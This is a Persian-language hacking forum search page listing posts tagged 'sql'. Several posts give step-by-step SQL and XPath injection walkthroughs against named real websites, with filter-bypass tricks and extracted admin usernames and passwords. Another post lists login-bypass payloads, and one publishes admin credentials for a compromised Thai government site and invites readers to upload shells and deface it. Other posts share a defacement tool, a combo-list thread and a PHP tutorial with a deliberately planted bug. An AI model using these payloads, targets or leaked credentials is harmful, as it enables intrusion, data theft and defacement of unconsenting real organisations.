رفتن به مطلب
انجمن تیم امنیتی گارد ایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروههای محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

  1. C0d3!Nj3ct!0n

    تارگت های Sql Injection

    برای تمرین باگ Sql Injection و برای اینکه کلی وقتتون جهت پیدا کردن باگ آسیب پذیر گرفته نشه در هر بخش چندین تارگت برای تمرین و نفوذ و هک سایت با باگ Sql Injection ( Hacking Web Application Sql Injection ) را برای شما قرار میدم . اسپم ندین و سوالات رو تنها در این بخش مطرح کنید . مجددا تکرار می کنم از قرار دادن سایتهای ایرانی خودداری فرمایید www.c2-europe.eu/news-full.php?id=1049 www.c2-deutschland.de/news-full.php?id=287 www.p5n.net/mtl/news-full.php?id=14 http://www.formsintl.com/news-full.php?id=14 موفق باشین
  2. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر .
  3. MR.MSA

    صفحه ثبت نام و ورود بدون دیتابیس | با PHP

    با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته:‌ دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
  4. Zed

    ابزار defaker

    سلام دوستان داخل این تاپیک می خوام بهتون نسخه 1.2 ابزار ساخت صفحه دیفیس رو معرفی کنم می تونید از این لینک نسخه 1.1 رو مشاهده کنید دوستان خیلی سر عنوان مشکل داشتن برای همین ما اسم ابزار رو گزاشتیم defaker که مخففه deface maker هستش نسخه بعدی این ابزار 2.3 خواهد بود که تغییرات زیادی خواهد داشت ( ساخت دیفیس {برای صفحه وب , برای سیستم عامل ها} ابزار های تست نفوذ وب باگ های { sql , xss , . . . } قابلیت ساخت و کنترل ویروس برای سیستم عامل های مختلف و . . . ) نمایه از ابزار ( نسخه 1.2 ) امیدوارم براتون کار آمد باشه تا فراموش نکردم باید تشکر کنم از دوست خوبمون @SHIWPTS13 که خیلی به من داخل ساخت این ابزار کمک کرد و کمک می کنند در همین تاپیک باید نوید ابزار SMSbomber رو بهتون بدم در دو پلتفرم وب ( می تونید لوکال هاست بیارید بالا یا از سایت استفاده کنید ) سیستم عامل ها ( گرافیکی ) به امید خدا به زودی سعی می کنیم این ابزار ها رو براتون قرار بدیم تا تاپیک های بعدی خدانگهدار در پناه حق defaker.rar نویسنده : ZD
  5. سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه در هر صورت ادرس سایت : https://www.sukhothai1.go.th یوزر : Zed پسورد : HackerZed ادرس پیج ادمین :https://www.sukhothai1.go.th/_admin/ می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید
  6. با سلام خدمت دوستان عزیز در این ویدئو آسیب پذیری Sql injection رو کار کردیم و بر خلاف ویدئو های قبل به همراه توضیح آموزش دادیم که مفاهیم رو بهتر یاد بگیرید. لایک، کامنت سابسکرایب فراموش نشه. موفق و پیروز باشید.
  7. nonamee

    Html,Css

    𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
  8. MR.MSA

    Xpath Injection Vulnerability Training

    با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری ‌Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید :‌ دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .
  9. nonamee

    تارگت برای آموزش Sqlinjection 2

    ••.•´¯`•.•• به نام خدا ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : https://www.nitrogenium.co.in/features-product.php?id=45 با قرار دادن ' آسیب پذیری مشخص خواهد شد https://www.nitrogenium.co.in/features-product.php?id=45' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور https://www.nitrogenium.co.in/features-product.php?id=45 order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group https://www.nitrogenium.co.in/features-product.php?id=45 group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم https://www.nitrogenium.co.in/features-product.php?id=45' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت https://www.nitrogenium.co.in/features-product.php?id=45' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل https://www.nitrogenium.co.in/features-product.php?id=45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
  10. nonamee

    مسدود شدن اکانت

    ••.•´¯`•.•• به نام خدا ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران دوستانی که چندین اکانت میسازن و پست های خودشون رو میپسندند باید این رو هم در نظر داشته باشید که مدیران سایت چک خواهند کرد و اکانت شما مسدود خواهد شد !
  11. nonamee

    تارگت برای آموزش Sqlinjection

    ••.•´¯`•.•• به نام خدا ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول http://musculoskeletalsociety.in/page.php?id=5 شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید http://musculoskeletalsociety.in/page.php?id=5 order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش http://musculoskeletalsociety.in/page.php?id=-5 order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است http://musculoskeletalsociety.in/page.php?id=-5 order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> http://www.belbana.com شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"http://www.belbana.com" inurl:"id=" http://www.belbana.com/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم http://www.belbana.com/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم http://www.belbana.com/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
  12. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  13. imanMN

    تاپیک کمبو لیست(combo list)

    دوستان عزیز در این تاپیک تمام کمبو لیست(combo list) های ایرانی و خارجی رو خودتون قرار بدید. قوانین 1-لیستتون رو فقط پیوست کنید 2-از اسپم خودداری کنید 3-نوع کمبو رو هم نام ببیرید 4-در صورت گذاشتن رمز رمز باید Guardiran باشد موفق باشید!!!
  14. MR.MSA

    sql injection ( انلاین )

